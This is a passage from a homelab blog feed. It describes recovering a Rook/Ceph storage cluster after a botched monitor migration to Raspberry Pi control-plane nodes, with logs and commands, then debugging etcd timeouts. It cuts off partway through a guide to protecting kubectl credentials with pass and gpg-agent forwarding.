<pre tabindex="0"><code>2025-04-12 10:31:16.256775 I | ceph-spec: ceph-object-store-user-controller: CephCluster &#34;k8s-rook&#34; found but skipping reconcile since ceph health is &amp;{Health:HEALTH_ERR Details:map[error:{Severity:Urgent Message:failed to get status. . [...]/src/mon/MonMap.h: In function &#39;void MonMap::add(const mon_i
nfo_t&amp;)&#39; thread 7f8ea6f2c640 time 2025-04-12T10:29:53.668780+0000
[...]/src/mon/MonMap.h: 221: FAILED ceph_assert(addr_mons.count(a) == 0)
</code></pre><p>Luckily for me, the operator checks the quorum before removing too many MONs,
and so the cluster was not broken. I fixed this by going back to my original
config, with three MONs placed on the three old control plane nodes. This
still did not bring back the cluster, still showing the above error. I fixed
this by editing the <code>rook-ceph-mon-endpoints</code> ConfigMap in the cluster namespace.
It&rsquo;s <code>data</code> key looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: <span style="color:#ae81ff">m=300.300.300.1:6789,k=300.300.300.2:6789,l=300.300.300.3:6789,n=300.300.300.4:6789,o=300.300.300.5:6789</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mapping</span>: <span style="color:#e6db74">&#39;{&#34;node&#34;:{&#34;k&#34;:{&#34;Name&#34;:&#34;oldcp1&#34;,&#34;Hostname&#34;:&#34;oldcp1&#34;,&#34;Address&#34;:&#34;300.300.300.1&#34;},&#34;l&#34;:{&#34;Name&#34;:&#34;oldcp2&#34;,&#34;Hostname&#34;:&#34;oldcp2&#34;,&#34;Address&#34;:&#34;300.300.300.2&#34;},&#34;m&#34;:{&#34;Name&#34;:&#34;oldcp3&#34;,&#34;Hostname&#34;:&#34;oldcp3&#34;,&#34;Address&#34;:&#34;300.300.300.3&#34;},&#34;n&#34;:{&#34;Name&#34;:&#34;newcp1&#34;,&#34;Hostname&#34;:&#34;newcp1&#34;,&#34;Address&#34;:&#34;300.300.300.4&#34;},&#34;o&#34;:{&#34;Name&#34;:&#34;newcp2&#34;,&#34;Hostname&#34;:&#34;newcp1&#34;,&#34;Address&#34;:&#34;300.300.300.5&#34;}}}&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">maxMonId</span>: <span style="color:#e6db74">&#34;12&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">outOfQuorum</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>This still had the new MONs in there, which did not work. After manually removing
the entries for the MONs <code>n</code> and <code>o</code>, which were the new ones and restarting the
operator, everything came up fine again with the original three MONs on the old
nodes.</p>
<p>So onto attempt Nr 2. Here I decided to go all in and immediately add all three
new nodes, instead of just two. That was because I realized that I could replace
all three MON addresses in the hardcoded netboot configs right away with the
new MONs if I just went straight to six MONs, the three old and three new ones.
This would save me one reboot for all netbooting cluster nodes.</p>
<p>So then I configured six MONs, and instead of replacing MONs in the placement
config, I just added the three new ones, so it now looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">count</span>: <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp2&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp3&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp2&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp3&#34;</span>
</span></span></code></pre></div><p>Applying this change worked without any issue whatsoever. The controller started
three new MON deployments, and they all came up without any problem.</p>
<p>I then changed the hardcoded MON IPs everywhere to the IPs of the three new
control plane nodes, and then rebooted the entire Homelab. Worked like a charm.</p>
<p>After that, the only thing remaining was to remove the old MONs. And here is
where the horror really started. I can&rsquo;t really put together what I did to create
this situation, so take the following paragraphs with a grain of salt. I hope
you can appreciate that I had other priorities than making good notes.</p>
<p>So I tried to get back to three MONs, but now running on the Pi 4 controller
nodes by going back to three MONs in the config and removing the three <code>oldcp</code>
nodes from the <code>nodeSelector</code>.</p>
<p>This seemed to lead the operator into an endless loop, because for some reason
it tried to stop one of the MON deployments on the new control plane nodes,
even though those were not supposed to be removed.</p>
<p>And here, I made my mistake. I got impatient, and manually deleted the
k8s Deployments of the MONs I did no longer need. Or I thought I no longer needed.
And when that did not really help, I edited the MON map ConfigMap again and
manually deleted the old MONs there as well.</p>
<p>The price for my impatience immediately showed up in the operator logs:</p>
<pre tabindex="0"><code>ceph-object-store-user-controller: CephCluster \&#34;k8s-rook\&#34; found but skipping reconcile since ceph health is &amp;{Health:HEALTH_ERR Details:map[error:{Severity:Urgent Message:failed to get status. . timed out: exit status 1}] [...]}
</code></pre><p>The operator&rsquo;s attempts to even just get the cluster status timed out. I
confirmed that by trying to run <code>ceph -s</code>, to no avail. There were still three
MONs running. But no quorum anymore. I had just nuked my storage cluster.</p>
<p>Or so I thought. Looking at the logs of the still running MONs, I saw this line:</p>
<pre tabindex="0"><code>e15 handle_auth_request failed to assign global_id
</code></pre><p>For some reason I can&rsquo;t explain, I thought this might have to do with the old
MONs still being configured somewhere. Searching the web did not really deliver
any results. But I ended up on <a href="https://docs.ceph.com/en/latest/rados/troubleshooting/troubleshooting-mon/">this Ceph docs page</a>.
It showed me a way to get the MON map when the Ceph client doesn&rsquo;t work anymore:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n rook-cluster rook-ceph-mon-n-f498b8448-dw55m -- bash
</span></span><span style="display:flex;"><span>ceph-conf --name mon.n --show-config-value admin_socket
</span></span><span style="display:flex;"><span>/var/run/ceph/ceph-mon.n.asok
</span></span></code></pre></div><p>With that information, I could dump the MON status info:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph --admin-daemon /var/run/ceph/ceph-mon.k.asok mon_status
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;mons&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;k&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.1:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.1:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;l&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.2:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.2:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;m&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.3:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.3:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;n&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.4:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.4:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;o&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.5:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.5:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;p&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.6:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.6:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>I&rsquo;ve removed a lot of additional information here, but the important part was:
Yes, the old MONs were still in the MON map. So how about updating the map so
it only contains the new MONs? Worth a try!</p>
<p>To do that, I needed to extract the actual MON map, in the correct format.
But that&rsquo;s, for some reason, only possible when the MON is stopped. But because
we&rsquo;re talking about Pods here, and not baremetal deployments, I couldn&rsquo;t just
stop a daemon and then access it still. So I looked closer at the error message:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph-mon -i n --extract-monmap /tmp/monmap
</span></span><span style="display:flex;"><span>2025-04-12T19:41:05.220+0000 ffffac4a5040 -1 rocksdb: IO error: While lock file: /var/lib/ceph/mon/ceph-n/store.db/LOCK: Resource temporarily unavailable
</span></span><span style="display:flex;"><span>2025-04-12T19:41:05.220+0000 ffffac4a5040 -1 error opening mon data directory at <span style="color:#e6db74">&#39;/var/lib/ceph/mon/ceph-n&#39;</span>: <span style="color:#f92672">(</span>22<span style="color:#f92672">)</span> Invalid argument
</span></span></code></pre></div><p>So, I thought: How much worse could it possibly get? And manually removed <code>/var/lib/ceph/mon/ceph-n/store.db/LOCK</code>.
The MON didn&rsquo;t seem to care and continued running, but now I had the MON map.</p>
<p>As I noted above: This is a cautionary tale. Not a how-to.</p>
<p>After I had the MON map, I needed to remove the three old MONs. For that, I was
able to use the <a href="https://docs.ceph.com/en/quincy/man/8/monmaptool/">monmaptool</a>:</p>
<pre tabindex="0"><code>monmaptool --rm k /tmp/monmap
monmaptool --rm l /tmp/monmap
monmaptool --rm m /tmp/monmap
</code></pre><p>And then I just needed to inject the MON map again, which I could do while the
MON was running:</p>
<pre tabindex="0"><code>ceph-mon -i n --inject-monmap /tmp/monmap
</code></pre><p>And then, after a restart of this utterly frankenstain&rsquo;ed MON&hellip;it came back up.
And it didn&rsquo;t throw the auth error anymore. And then one of the other running
MONs also came up again. And then the state check errors stopped in the operator
logs. And my <code>ceph -s</code> worked again. Much rejoicing was had. So much rejoicing.</p>
<p>I deleted the deployment of the last MON, as it wasn&rsquo;t willing to come up again.
And then the operator redeployed it, and it came up fine again.</p>
<p>Then I retreated to my fainting couch and contemplated my own hubris, stupidity
and especially impatience.</p>
<p>But it was done. Ceph being the battle-tested piece of software it is, there was
zero issue afterwards. The OSDs were almost happy the entire time and didn&rsquo;t
even need a restart.</p>
<p>If we could bottle the elation and relieve I felt when the first MON started
spewing its comfortably familiar log outputs again, we would have one hell of
a drug on our hands. Bottled euphoria, pretty much.</p>
<p>Restoring it all from a blank Ceph cluster would have been a hell of a lot of work.</p>
<h2 id="stability-problems">Stability problems</h2>
<p>So I now had my control plane running on three Raspberry Pi 4 4GB. I had tried
to make sure that those Pis would have enough resources by giving the VMs that
ran the control plane before only four cores and 4GB of RAM, to keep them at
least somewhat close to the Pis.</p>
<p>But that did not give me a realistic estimate on whether the Pis would be able
to run the control plane. On the morning after I had finished the migration,
I woke up to two of my Vault Pods requiring unsealing because they were restarted.
After some searching, I thought I had found the culprit with these error messages:</p>
<pre tabindex="0"><code>2025-04-13 10:16:28.000 &#34;This node is becoming a follower within the cluster&#34;
2025-04-13 10:16:28.000 &#34;lost leadership, restarting kube-vip&#34;
2025-04-13 10:16:27.372 &#34;1 leaderelection.go:285] failed to renew lease kube-system/plndr-cp-lock: timed out waiting for the condition
2025-04-13 10:16:27.371 &#34;1 leaderelection.go:332] error retrieving resource lock kube-system/plndr-cp-lock: Get \&#34;https://kubernetes:6443/apis/coordination.k8s.io/v1/namespaces/kube-system/leases/plndr-cp-lock?timeout=10s\&#34;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)&#34;
</code></pre><p>After some checking I realized that, for some reason, my Ansible playbook hadn&rsquo;t
deployed kube-vip to two of my three Pi control plane nodes.</p>
<p>But that, sadly, wasn&rsquo;t the real issue. In the following days, I regularly came
home to find one or more of my Vault Pods having been restarted during the night.</p>
<p>After some intense log reading, I think I identified the problem: Very regular
timeouts in etcd. That&rsquo;s Kubernetes&rsquo; distributed database, holding the cluster&rsquo;s
state. I very regularly get spurious leader elections where the three nodes
can&rsquo;t even agree on what term it is. That then ultimately leads to timed out
requests from the kube-apiserver and restarts of kube-apiserver, kube-controller-manager
and kube-scheduler. This isn&rsquo;t really that bad - they seem to be perfectly able
to come up again. But still.</p>
<p>It&rsquo;s also not a permanent situation. Yesterday, for example, I didn&rsquo;t have any
spurious restarts on any host for over 31 hours.
Here&rsquo;s an example of kube-apiserver complaining:</p>
<pre tabindex="0"><code>2025-04-17 11:18:28.292 status.go:71] apiserver received an error that is not an metav1.Status: &amp;errors.errorString{s:\&#34;http: Handler timeout\&#34;}: http: Handler timeout
2025-04-17 11:18:28.292 writers.go:122] apiserver was unable to write a JSON response: http: Handler timeout
2025-04-17 11:18:28.291 status.go:71] apiserver received an error that is not an metav1.Status: context.deadlineExceededError{}: context deadline exceeded
</code></pre><p>And then there&rsquo;s etcd:</p>
<pre tabindex="0"><code>2025-04-17 11:18:30.903	slow fdatasync took=1.59687293s expected-duration=1s
2025-04-17 11:18:30.771	request stats start time=2025-04-17T09:18:28.771395Z time spent=2.000537375s remote=127.0.0.1:58000 response type=/etcdserverpb.KV/Range request count=0 request size=18 response count=0 response size=0 request content=&#34;key:\&#34;/registry/health\&#34;&#34;
2025-04-17 11:18:30.771	duration=2.000309284s start=2025-04-17T09:18:28.771470Z end=2025-04-17T09:18:30.771780Z steps=&#34;[\&#34;trace[1219274112] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 2.00005686s)\&#34;]&#34; step_count=1
2025-04-17 11:18:30.771	apply request took too long took=2.000065119s expected-duration=100ms prefix=&#34;read-only range &#34; request=&#34;key:\&#34;/registry/health\&#34; &#34; response= error=&#34;context canceled&#34;
2025-04-17 11:18:29.154	timed out sending read state timeout=1s
2025-04-17 11:18:28.750	request stats start time=2025-04-17T09:18:26.749079Z time spent=2.000959149s remote=127.0.0.1:57984 response type=/etcdserverpb.KV/Range request count=0 request size=18 response count=0 response size=0 request content=&#34;key:\&#34;/registry/health\&#34; &#34;
2025-04-17 11:18:28.749	duration=2.000699837s start=2025-04-17T09:18:26.749169Z end=2025-04-17T09:18:28.749869Z steps=&#34;[\&#34;trace[1722676343] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 2.00044495s)\&#34;]&#34; step_count=1
2025-04-17 11:18:28.749	apply request took too long took=2.000456339s expected-duration=100ms prefix=&#34;read-only range &#34; request=&#34;key:\&#34;/registry/health\&#34; &#34; response= error=&#34;context canceled&#34;
</code></pre><p>One really weird thing to note: The issues seem to always come at xx:18? The hour
at which they happen varies, but it&rsquo;s always around 18 minutes past the hour.</p>
<p>Just to illustrate how bad it sometimes gets, here are two attempts at getting
node agreement before linearized reads, taking 18 and 19 seconds:</p>
<pre tabindex="0"><code>2025-04-17 11:18:32.278 duration=19.273386011s start=2025-04-17T09:18:13.004696Z end=2025-04-17T09:18:32.278082Z steps=&#34;[\&#34;trace[416778461] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 19.242077797s)\&#34;]&#34; step_count=1
2025-04-17 11:18:32.278 duration=18.583085717s start=2025-04-17T09:18:13.694856Z end=2025-04-17T09:18:32.277941Z steps=&#34;[\&#34;trace[434574392] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 18.548892027s)\&#34;]&#34; step_count=1
</code></pre><p>On the positive side: The cluster itself didn&rsquo;t really seem fazed by the restarts.
It just trucked along. The only reason I had a problem with Vault was that I
like having the unseal key only be stored in my password manager, and not
automatically accessible.</p>
<p>But this is obviously not a permanent state. I have already found that running
<code>journalctl -ef</code> on one of the controller nodes pretty reliably brings down
at least one of the kube components. Updating a more complex Helm chart like
<a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>
also does the trick pretty reliably.</p>
<p>For once, I&rsquo;m decidedly not looking forward to the service updates I&rsquo;ve got
scheduled for tomorrow morning. Let&rsquo;s see how that goes.</p>
<p>But the remediation has already been put into action: I&rsquo;ve ordered three
Raspberry Pi 5 8GB plus 500 GB NVMe SSDs and NVMe hats for the Pis. I&rsquo;m assuming
that those will cope a hell of a lot better with the I/O load and tight latency
tolerances of the Kubernetes control plane.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>On Saturday night, after I had taken down the server which provided me with
some additional capacity during the migration, I felt most excellent. I was
starting to consider which Homelab project I would tackle next. There are so
many to choose from. I was rather disappointed when I was greeted by the downed
Vault Pods on Sunday morning.</p>
<p>But not to whine too much - this gave me an excellent reason to get started on
the Pi 5. Plus I also bought a 16 GB Pi 5 and a 1TB SSD. Those will serve me
well in some future ideas I&rsquo;ve got.</p>
<p>Plus, even though it&rsquo;s currently a bit unstable: I&rsquo;m done. &#x1f973;
The migration is done. I&rsquo;m now the proud owner of a Kubernetes cluster.</p>
<p>There is one more post to come in this series,
with my final thoughts and stats on the migration. But first, I want to migrate
the CP nodes to the Pi 5. But before that, I definitely want to upgrade the OS
in the Homelab from Ubuntu 22.04 to 24.04, because that&rsquo;s the first one with Pi 5
support, and I don&rsquo;t want to have multiple Ubuntu versions in the Homelab.</p>
<p>Now please excuse me while I go sharpen my Yak shaver.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Securing K8s Credentials</title>
      <link>https://blog.mei-home.net/posts/securing-k8s-credentials/</link>
      <pubDate>Mon, 07 Apr 2025 23:50:43 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/securing-k8s-credentials/</guid>
      <description>Using pass and gpg-agent to secure kubectl access credentials</description>
      <content:encoded><![CDATA[<p>Wherein I will explain how to use pass and GnuPG to secure k8s credentials.</p>
<p>Since I migrated my <a href="https://www.vaultproject.io/">HashiCorp Vault</a> instance
into my Kubernetes cluster, I started to feel a bit uncomfortable with the
Kubernetes access credentials just sitting in the <code>~/.kube/config</code> file in
plain text. Anyone who somehow gets access to my Command &amp; Control host would
be able to access them and do whatever they like with the Kubernetes cluster,
including the Vault deployment containing a lot of my secrets.</p>
<p>So I asked around on the Fediverse, and <a href="https://microblog.shivering-isles.com/@sheogorath">Sheogorath@shivering-isles.com</a>
came back with two interesting blog posts. <a href="https://shivering-isles.com/2024/11/kubernetes-oidc-keycloak">The first one</a>,
using OIDC, was interesting, but it would require some additional infrastructure
that would need to be up whenever I wanted to do something in Kubernetes. Which
would have also meant that I couldn&rsquo;t run that infrastructure in Kubernetes
itself.</p>
<p>But the <a href="https://shivering-isles.com/2022/03/store-kubernetes-credentials-pass">second post</a>
was very interesting, showing how to use <a href="https://www.passwordstore.org/">pass</a>
to store the k8s credentials.</p>
<p>I&rsquo;m already using pass as my password manager on my desktop and phone, so this
sounded like an excellent idea.</p>
<p>In short, pass is a pretty simple bash script which uses <a href="https://gnupg.org/">GnuPG</a>
do encrypt and decrypt files containing passwords, or really any data at all,
sitting in my home directory. The initial setup is a little bit
more involved due to needing GnuPG keys, but afterwards it&rsquo;s pretty easy to
use. Its main interface is a command line script with the possibility of
entering new passwords and showing existing ones, as well as moving passwords
around.
But there&rsquo;s also an Android app and a Firefox browser extension which both
work very nicely.</p>
<p>There was only one problem: I didn&rsquo;t want to set up a whole different set of
GnuPG keys to use on my Command &amp; Control host. After some searching, I figured
out that <a href="https://www.gnupg.org/documentation/manuals/gnupg/Invoking-GPG_002dAGENT.html">gpg-agent</a>
has some forwarding options, similar to ssh-agent. And I already had gpg-agent
running on my desktop.</p>
<p>Using a remote gpg-agent for access to the secret key also has an additional
advantage: Even if an attacker can get into my Command &amp; Control server, the
key necessary to decrypt the Kubernetes credentials is not physically present
on the machine. One more hurdle for an attacker to overcome.</p>
<h2 id="setting-up-gnupg-on-the-command--control-machine">Setting up GnuPG on the Command &amp; Control machine</h2>
<p>The first thing to do is to set up the public key of the secret key that will
later be used by pass to encrypt the Kubernetes credentials.
Note that only the public key is needed here - the private key stays on the
original machine, in my case my desktop computer.</p>
<p>First, list the keys on the original host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpg --list-public-keys
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>pub   rsa4096 2022-06-23 <span style="color:#f92672">[</span>SC<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>      3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F
</span></span><span style="display:flex;"><span>uid        <span style="color:#f92672">[</span> ultimativ <span style="color:#f92672">]</span> Foo Bar &lt;mail@example.com&gt;
</span></span><span style="display:flex;"><span>uid        <span style="color:#f92672">[</span> ultimativ <span style="color:#f92672">]</span> Baz Bar <span style="color:#f92672">(</span>Private<span style="color:#f92672">)</span> &lt;mail2@example.com&gt;
</span></span><span style="display:flex;"><span>sub   rsa4096 2022-06-23 <span style="color:#f92672">[</span>E<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>In this output, the important part is the keyhash in the line after the <code>pub</code>
line: <code>3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F</code>.
That&rsquo;s the identifier for the key.</p>
<p>Next, I needed to transfer the public key over to my Command &amp; Control host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpg --export 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F | ssh myuser@candchost gpg --import
</span></span></code></pre></div><p>With that done, I could go ahead and set up the GnuPG agent forwarding. I followed
<a href="https://wiki.gnupg.org/AgentForwarding">this documentation</a> and did not have
any issues.</p>
<p>In short, I added these lines to the SSHD server configuration on the <code>candchost</code>:</p>
<pre tabindex="0"><code>Match User myuser
  StreamLocalBindUnlink yes
</code></pre><p>In addition, I also had to add these lines to my own SSH config for my user on
my desktop from where I&rsquo;m accessing the Command &amp; Control host, at <code>~/.ssh/config</code>:</p>
<pre tabindex="0"><code>Host candchost
  RemoteForward  /run/user/1000/gnupg/S.gpg-agent /run/user/1000/gnupg/S.gpg-agent.extra
</code></pre><p>As the documentation notes, the following commands can be used. For the
second path in the <code>RemoteForward</code> option, which is the local (on my desktop)
gpg-agent &ldquo;extra&rdquo; socket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpgconf --list-dir agent-extra-socket
</span></span></code></pre></div><p>And then to get the socket on the <code>candchost</code>, for the first argument of <code>RemoteForward</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpgconf --list-dir agent-socket
</span></span></code></pre></div><p>This is just the path of the standard GnuPG socket on that host.</p>
<p>And that&rsquo;s all there was to it. When I reconnected to the <code>candchost</code> via SSH, I
was able to use gpg-agent and got access to my remote agent on my desktop.</p>
<p>One last thing to do was to trust the public key transferred to the <code>candchost</code>.
This is only possible after the forwarding has been configured, because I didn&rsquo;t
have, and don&rsquo;t need, a private key to do any trusting with on the <code>candchost</code>.</p>
<p>Trusting a key works like this:</p>
<pre tabindex="0"><code>gpg --edit-key 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F
Secret key is available.

[...]

gpg&gt; trust
[...]

Please decide how far you trust this user to correctly verify other users&#39; keys
(by looking at passports, checking fingerprints from different sources, etc.)

  1 = I don&#39;t know or won&#39;t say
  2 = I do NOT trust
  3 = I trust marginally
  4 = I trust fully
  5 = I trust ultimately
  m = back to the main menu

Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y

[...]
Please note that the shown key validity is not necessarily correct
unless you restart the program.

gpg&gt; q
</code></pre><p>This procedure uses the private key from the gpg-agent, meaning the key from
my desktop system, which was a nice confirmation that the forwarding setup
worked.</p>
<h2 id="setup-pass">Setup pass</h2>
<p>The next step is to setup pass. First, install it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>apt install --no-install-recommends --no-install-suggests pass
</span></span></code></pre></div><p>The <code>--no-install-suggests</code> and <code>--no-install-recommends</code> flags are very much
required, otherwise you&rsquo;re going to get pieces of X11 installed on an Ubuntu
system.</p>
<p>To initialize pass, the <code>init</code> command is used, with the public key&rsquo;s keyhash
used as input:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>pass init 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F
</span></span></code></pre></div><p>This creates the password store in the default location at <code>~/.password-store</code>.</p>
<h2 id="setup-kubernetes">Setup Kubernetes</h2>
<p>Following Sheogorath&rsquo;s <a href="https://shivering-isles.com/2022/03/store-kubernetes-credentials-pass">blog post</a>,
I first extracted the keys from the Kube config file with these commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl config view --minify --raw --output <span style="color:#e6db74">&#39;jsonpath={..user.client-certificate-data}&#39;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span> &gt; client-cert
</span></span><span style="display:flex;"><span>kubectl config view --minify --raw --output <span style="color:#e6db74">&#39;jsonpath={..user.client-key-data}&#39;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span> &gt; client-key
